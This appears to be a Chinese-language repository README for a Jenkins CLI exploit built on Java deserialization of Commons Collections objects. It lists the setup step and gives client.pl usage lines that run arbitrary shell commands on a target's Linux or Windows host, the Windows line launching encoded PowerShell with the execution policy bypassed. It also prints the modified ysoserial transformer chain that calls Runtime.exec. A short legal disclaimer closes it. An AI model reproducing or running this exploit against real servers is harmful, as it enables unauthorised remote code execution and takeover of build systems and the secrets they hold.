# jenkins-cli-exploit **Repository Path**: yuanh_021/jenkins-cli-exploit ## Basic Information - **Project Name**: jenkins-cli-exploit - **Description**: No description available - **Primary Language**: Java - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2017-07-06 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ### 漏洞详情 [http://tools.changesec.com/Jenkins-CommonCollections-Exploit/](http://tools.changesec.com/Jenkins-CommonCollections-Exploit/ "Jenkins CommonCollections Exploit Download") ### jenkins-cli-exploit 花时间学了一下 transformer,这个版本支持任意命令! ### 安装环境 ``` cpan IPC::Run ``` ### 利用方法 ``` ./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked' ./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx' ``` 来个截图, ![截图] (https://raw.githubusercontent.com/CaledoniaProject/jenkins-cli-exploit/master/contrib/sample.jpg "Desktop screenshot") ### 源代码 官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection, 分别为, ``` CommonsCollections1Linux CommonsCollections1Win ``` 修改点,你懂的, ``` final String[] execArgs = new String[] { "sh", "-c", command }; // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String[].class }, new Object[] { execArgs }), new ConstantTransformer(1) }; ``` 代码懒得上传了,直接用lib的就可以 ### Legal Disclaimer Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.